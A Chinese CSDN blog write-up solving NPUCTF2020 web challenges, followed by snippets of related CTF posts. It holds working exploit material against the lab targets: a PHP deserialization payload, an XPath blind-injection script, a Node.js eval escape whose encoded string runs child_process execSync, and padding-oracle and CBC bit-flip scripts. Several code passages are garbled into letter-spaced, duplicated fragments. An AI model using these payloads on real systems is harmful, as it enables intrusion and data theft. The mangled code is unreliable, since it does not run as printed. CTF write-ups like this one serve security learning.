npuctf

最新推荐文章于 2024-08-07 20:16:15 发布
最新推荐文章于 2024-08-07 20:16:15 发布
阅读量716 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zipry/article/details/106971167
版权

NPUCTF 复现 CTF WP 计算机网络 CTF 学习总结 密码学 操作系统 NPUCTF 复现 2个月前 / 0评 / 1赞 赏 码比赛的时候运维太差了,所以就想着赛后复现一下。Table of Contents[NPUCTF2020]ReadlezPHP[NPUCTF2020]ezlogin[NPUCTF2020]验证🐎[NPUCTF2020]ezinclude[NPUCTF2020]web🐕[NPUCTF2020]ReadlezPHP这道题还是比较基本的php反序列化。<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = “Y-m-d h:i:s”;
$this->b = “date”;
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo b ( b( b(a);
}
}
$c = new HelloPhp;

if(isset($_GET[‘source’]))
{
highlight_file(FILE);
die(0);
}

@ p p p = u n s e r i a l i z e ( ppp = unserialize( ppp=unserialize(_GET[“data”]); 很明显,传入$b做函数,执行一下。这里system什么的被ban了,可以用call_user_func函数(call_user_func — 把第一个参数作为回调函数调用)。payload:<?php
class HelloPhp
{
public $a;
public $b;

}
$a=new HelloPhp();
$a->b=‘call_user_func’;
a − > a = ′ p h p i n f o ′ ; e c h o u r l e n c o d e ( s e r i a l i z e ( a->a='phpinfo'; echo urlencode(serialize( a>a=phpinfo;echourlencode(serialize(a));

?>执行打一发上去就可以在环境变量里看见flag。[NPUCTF2020]ezlogin这道题xpath注入。这道题的“非法注入”和“用户名或密码错误”很神奇,大概“非法注入”就是true,然后为false,这就是不让人登陆了呗。布尔盲注就可以注出用户名和密码的md5,解密登陆就可以。原理戳这篇文章。exp:import requests
import re
import time
r = requests.session()
s=‘abcdefghijklmnopqrstuvwxyz1234567890,’
headers = {‘Content-Type’:‘application/xml’}
for a in range(1,50):
for b in s:
url=‘http://d6714c8f-8cae-4daf-8348-abdc6b9348a5.node3.buuoj.cn/’
token=re.search(’’,r.get(url).text)[1]
data="’ or substring(/root/accounts/user[2]/username/text(), “+str(a)+”, 1)=’"+b+"’ or '112"+token+""
result=r.post(url=url+‘login.php’,headers=headers,data=data).text
time.sleep(0.5)
if ‘非法操作’ in result:
print(b)
break然后登陆进去,很明显的伪协议,过滤很基础,大小写绕过,没什么好说的。[NPUCTF2020]验证🐎给了源码:const express = require(‘express’);
const bodyParser = require(‘body-parser’);
const cookieSession = require(‘cookie-session’);

const fs = require(‘fs’);
const crypto = require(‘crypto’);

const keys = require(’./key.js’).keys;

function md5(s) {
return crypto.createHash(‘md5’)
.update(s)
.digest(‘hex’);
}

function saferEval(str) {
if (str.replace(/(?:Math(?:.\w+)?)|[()+-/&|^%<>=,?:]|(?:\d+.?\d(?:e\d+)?)| /g, ‘’)) {
return null;
}
return eval(str);
} // 2020.4/WORKER1 淦,上次的库太垃圾,我自己写了一个

const template = fs.readFileSync(’./index.html’).toString();
function render(results) {
return template.replace(’{{results}}’, results.join(’
’));
}

const app = express();

app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

app.use(cookieSession({
name: ‘PHPSESSION’, // 2020.3/WORKER2 嘿嘿,给👴爪⑧
keys
}));

Object.freeze(Object);
Object.freeze(Math);

app.post(’/’, function (req, res) {
let result = ‘’;
const results = req.session.results || [];
const { e, first, second } = req.body;
if (first && second && first.length === second.length && first!==second && md5(first+keys[0]) === md5(second+keys[0])) {
if (req.body.e) {
try {
result = saferEval(req.body.e) || ‘Wrong Wrong Wrong!!!’;
} catch (e) {
console.log(e);
result = ‘Wrong Wrong Wrong!!!’;
}
results.unshift(${req.body.e}=${result});
}
} else {
results.unshift(‘Not verified!’);
}
if (results.length > 13) {
results.pop();
}
req.session.results = results;
res.send(render(req.session.results));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码,用行数计算KPI
app.get(’/source’, function (req, res) {
res.set(‘Content-Type’, ‘text/javascript;charset=utf-8’);
res.send(fs.readFileSync(’./index.js’));
});

app.get(’/’, function (req, res) {
res.set(‘Content-Type’, ‘text/html;charset=utf-8’);
req.session.admin = req.session.admin || 0;
res.send(render(req.session.results = req.session.results || []))
});

app.listen(80, ‘0.0.0.0’, () => {
console.log(‘Start listening’)
});首先得绕这条语句if (first && second && first.length === second.length && first!second && md5(first+keys[0]) === md5(second+keys[0])),然后在saferEval那里有个eval,看看能不能执行点什么。前面的那个用传参的类型差异就可以绕过。比如数组和字符串相加会转为字符串,对象和字符串相加也会转为字符串,所以上传这个就行。{“first”:“1”,“second”:[1]},因为直接传urlencoded的表单是没法传数组的,所以只能用json传。然后看看正则那里ban掉了很多,得用的是Math,能用的是()+-*&|%^<>=,?:,能有箭头函数=>,用原型链来绕即可。还是对着payload讲。(Math=>(Math=Math.constructor,Math.constructor(Math.fromCharCode(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,121,110,99,40,39,99,97,116,32,47,102,108,97,103,39,41,46,116,111,83,116,114,105,110,103,40,41))))(Math+1)()这里Math=Math.constructor,所以Math为String,然后里面又有Math.constructor,这时为Function,lambda表达式就不详细讲了,化简其实格式为eval((Math=>(Math=Math.constructor,Math.constructor(Math.fromCharCode(114,101,116,117,114,110,32,49))))(Math+1)())进一步格式为eval((x=>(Function(String.fromCharCode(114,101,116,117,114,110,32,49))))(1)())。[NPUCTF2020]ezinclude这道题打开有hint: md5( s e c r e t . secret. secret.name)= p a s s , 这 道 题 就 很 奇 怪 , c o o k i e 里 有 h a s h , 经 测 试 为 m d 5 ( pass,这道题就很奇怪,cookie里有hash,经测试为md5( passcookiehashmd5(secret. n a m e ) , 所 以 直 接 打 上 去 就 行 了 。 出 题 人 逻 辑 写 错 了 , 感 觉 是 想 弄 h a s h 扩 展 长 度 攻 击 , 自 己 代 码 逻 辑 写 错 了 , 后 台 s e t − c o o k i e 应 该 是 m d 5 ( name),所以直接打上去就行了。出题人逻辑写错了,感觉是想弄hash扩展长度攻击,自己代码逻辑写错了,后台set-cookie应该是md5( name)hashsetcookiemd5(secret. p a s s ) , 就 这 直 接 返 回 m d 5 ( pass),就这直接返回md5( pass)md5(secret. n a m e ) 。 。 。 直 接 打 , 去 到 f l f l f l f l a g . p h p 。 然 后 看 见 i n c l u d e ( name)。。。直接打,去到flflflflag.php。然后看见include( name)flflflflag.phpinclude(_GET[“file”]),大概就是文件包含了。这里利用了临时文件的一个点。可以参考这篇文章。我们利用postman上传文件(不知道为什么get不了shell,一句话木马没用,我还是直接命令执行了)。然后临时文件保存在/tmp/目录下,而且这道题还有个hint,扫目录有dir.php,可以看见我们上传的临时文件的文件名,就不用去爆破了。[NPUCTF2020]web🐕padding oracle和CBC字节翻转攻击源码:我摊牌了,就是懒得写前端

<?php error_reporting(0); include('config.php'); # $key,$flag define("METHOD", "aes-128-cbc"); //定义加密方式 define("SECRET_KEY", $key); //定义密钥 define("IV","6666666666666666"); //定义初始向量 16个6 define("BR",'
'); if(!isset($_GET['source']))header('location:./index.php?source=1'); #var_dump($GLOBALS); //听说你想看这个? function aes_encrypt($iv,$data) { echo "--------encrypt---------".BR; echo 'IV:'.$iv.BR; return base64_encode(openssl_encrypt($data, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)).BR; } function aes_decrypt($iv,$data) { return openssl_decrypt(base64_decode($data),METHOD,SECRET_KEY,OPENSSL_RAW_DATA,$iv) or die('False'); } if($_GET['method']=='encrypt') { $iv = IV; $data = $flag; echo aes_encrypt($iv,$data); } else if($_GET['method']=="decrypt") { $iv = @$_POST['iv']; $data = @$_POST['data']; echo aes_decrypt($iv,$data); } echo "我摊牌了,就是懒得写前端".BR; if($_GET['source']==1)highlight_file(__FILE__); ?> exp:import requests

import time

def xor(str1, str2):
return ‘’.join([chr(ord(str1[i]) ^ ord(str2[i])) for i in range(len(str1))])

def attack():
N = 16
true_iv= ‘6666666666666666’
url = ‘http://4ee80502-6705-4e4f-aec9-3230f6c23e40.node3.buuoj.cn/index.php?source=1&method=decrypt’
tmp_value = ‘’
for i in range(1, N+1):
for j in range(0,256):
time.sleep(0.05)
padding = xor(tmp_value, chr(i) * (i - 1))
new_iv = chr(0) * (N - i) + chr(j) + padding
header = {“data”: “ly7auKVQCZWum/W/4osuPA==”, “iv”: new_iv}
res = requests.post(url, data=header)
if “我” in res.text:
tmp_value = chr(j ^ i) + tmp_value
print(tmp_value)
break
if len(tmp_value)==15:
print(xor(“666666666666666”,tmp_value))
print(xor(true_iv,tmp_value))

attack()源码:Ghlr6j1Y1PQDSDalySCPdw==

<?php #error_reporting(0); include('config.php'); //$fl4g define("METHOD", "aes-128-cbc"); define("SECRET_KEY", "6666666"); session_start(); function get_iv(){ //生成随机初始向量IV $random_iv=''; for($i=0;$i<16;$i++){ $random_iv.=chr(rand(1,255)); } return $random_iv; } $lalala = 'piapiapiapia'; if(!isset($_SESSION['Identity'])){ $_SESSION['iv'] = get_iv(); $_SESSION['Identity'] = base64_encode(openssl_encrypt($lalala, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $_SESSION['iv'])); } echo base64_encode($_SESSION['iv'])."
"; if(isset($_POST['iv'])){ $tmp_id = openssl_decrypt(base64_decode($_SESSION['Identity']), METHOD, SECRET_KEY, OPENSSL_RAW_DATA, base64_decode($_POST['iv'])); echo $tmp_id."
"; if($tmp_id ==='weber')die($fl4g); } highlight_file(__FILE__); ?> exp:import base64 as b64

source_str = “piapiapiapia” + 4 * chr(4)
target_srt = “weber” + 11 * chr(11)
iv_array = “pca4HM0iKQ9tHEzaAYbWgQ==” #你获得的初始IV的base64encode值
iv_array = bytearray(b64.b64decode(iv_array))
for i in range(0, 16):
iv_array[i] = iv_array[i] ^ ord(source_str[i]) ^ ord(target_srt[i])

#iv = bytes(iv_array)
print(b64.b64encode(iv_array))然后java反编译一下,转个ascii码就可。CISCN 2019 华东北赛区 web2 发表评论 取消回复电子邮件地址不会被公开。 必填项已用*标注姓名 * 电子邮件 * 站点 在此浏览器中保存我的名字、电邮和网站。评论 COMMITING…# Blog 联系 © 2020 zkw的流水日记 默认护眼夜晚SerifSans

zipry
关注
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 3046
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
[NPUCTF2020]EzRSA
2er0!=O的博客
07-25 562
[NPUCTF2020]EzRSA 附件: from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fla
[NPUCTF2020]ReadlezPHP1
最新发布
kw741951的博客
08-07 207
此处未想到flag在phpinfo文件中,在网上才发现flag在phpinfo文件,因此构造序列化信息:O:8:"HelloPhp":2:{s:1:"a";ctrl+u查看源代码。看到php代码,打开。
[NPUCTF2020]EzRSA Writeup
bestkasscn的博客
12-02 558
[NPUCTF2020]EzRSA 题目描述 from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fl
NPUCTF_crypto
qq_45628145的博客
04-23 797
这是什么密码 下载附件, 得到一个zip,解压得到一张名称为flag.jpg的图片 观察到右小角的小纸条,进行分析 前面的缩写为F、W、S2等为每星期一到星期天的缩写,S2代表星期天,后面的第二个数字代表这个月的第几个这一天,根据这个日历对应下来,得到3 8 12 5 14 4 8 18,将其按照字母表转换为chlendhr,但得到的这个字符串。开始对应的时候把4月1日省去了,因为这一天被圈起来...
NPUCTF pwn
doudoudedi
04-21 765
题目质量很高萌新直接自闭 z这2道题都挺基础的 easy_heap exp: off by one 造成了任意地址写的漏洞 #!/usr/bin/python2 from pwn import * p=0 def pwn(): global p #p=process('./pwn') p=remote('ha1cyon-ctf.fun',30179) elf=ELF('./pwn') l...
[NPUCTF2020]验证
feng的博客
04-02 1400
知识点 JS弱类型 JS的toString特性 正则表达式绕过 JS箭头函数利用 JS原型链 不会node.js我太菜了,要慢慢学起来。 WP 进入环境访问/source路由看到源码: const express = require('express'); const bodyParser = require('body-parser'); const cookieSession = require('cookie-session'); const fs = require('fs'); const
npuctf_2020_level2
z1r0的博客
03-16 365
npuctf_2020_level2 查看保护 一个格式化字符串漏洞 攻击思路:因为buf不在栈上在bss上,所以这是一个bss上的格式化字符串漏洞。开了pie,所以可以先通过栈上数据泄露出格上地址和libc。接着改栈上数据将栈的链子给链到retaddr这里,然后改ret为one_gadget即可。 1.看一下栈上数据 libc的偏移为7,arg的链子偏移为9,泄露出这两个地址 2.将arg的这个链子最后的地址改成带有ret_addr的地址。 3.接着就是改ret_addr为one_gadget。 注
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]Mersenne twister(mt73991伪随机)
weixin_44110537的博客
09-06 491
encrypt from hashlib import * from itertools import * from binascii import hexlify , unhexlify from flag import flag ,seed assert len(flag) == 26 assert flag[:7] == 'npuctf{' assert flag[-1] == '}' XOR = lambda s1 ,s2 : bytes([x1 ^ x2 for x1 ,x2 in zip(
[NPUCTF2020]共 模 攻 击
2er0!=O的博客
08-01 993
[NPUCTF2020]共 模 攻 击 附件: hint.py: from gmpy2 import * from Crypto.Util.number import * from secret import hint m = bytes_to_long(hint) p = getPrime(256) c = pow(m, 256, p) print(p) p, q = getPrime(256), getPrime(256) n = p * q e1, e2 = getPrime(32), getP
[NPUCTF2020]Classical Cipher
2er0!=O的博客
07-23 1171
[NPUCTF2020]Classical Cipher 附件: key.txt: 解密后的flag请用flag{}包裹 压缩包密码:gsv_pvb_rh_zgyzhs 对应明文: ***_key_**_****** 词频分析 得到压缩包密码: 第一个尝试无果,发现第二个才是正确的密码: the_key_is_atbash 猪圈加动物???? 解密得到flag: classicalcode 根据题目要求套上flag提交即可! ...
[NPUCTF2020]ezinclude
yym68686
10-17 2647
目录[NPUCTF2020]ezinclude方法一 利用php7 segment fault特性(CVE-2018-14884)方法二 利用 session.upload_progress 进行 session 文件包含 [NPUCTF2020]ezinclude 打开网页,查看源代码,发现注释提示: md5($secret.$name)===$pass 输入url: /?name=1 变化name的值,发现cookies的hash值在不断变化,说明hash值跟name的取值有关,但又不完全是name
NPUCTF 2020 Crypto
cwr1499640048的博客
05-23 706
NPUCTF 2020 Crypto 认清形势,建立信心 p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, ...
NPUCTF 2020 Crypto writeup
Slightwind's Blog
04-24 3593
认清形势,建立信心 题目中给了 2e mod n2^e \ mod \ n2e mod n, 4e mod p4^e \ mod \ p4e mod p 和 8e mod p8^e \ mod \ p8e mod p。令它们分别为 ...
[NPUCTF2020]ezlogin (xpath盲注)
记录学习,一起进步
03-26 878
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]ezlogin
nigo134的博客
06-13 581
xPath注入这题服务端用户名和密码通过xml文件存储,通过将提交的用户名和密码拼接到xpath中进行查询,查询到数据即通过验证,反之则未通过。猜测后台xpath语法: 我们可以在$username处进行注入1.获取根下的节点个数 通过count(/)获取根下节点个数,当等于2时错误因此判断根下只有一个节点。2.获取根下节点名 string-length() :获取字符串长度substring() :截取字符串name() :获取节点名称3.重复1和2遍历出所有叶子
[NPUCTF2020]验证
2202_75361164的博客
04-01 1965
[NPUCTF2020]验证🐎 首先要first和second的length属性相同,那就不能用数字和字典了,使用字符串或者数组 然后因为`keys[0]`我们不知道,但是他基本上是String类型,根据上面的String类型加别的类型规则,我们只需让`first=[1]`,second='1',就可以让`first+keys[0] === second+keys[0]`,从而绕过md5 不能用text格式了,需要用json传,保证一个是数组一个是字符串。 根据上面我们在来看这题需要使用箭头函数的自调
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值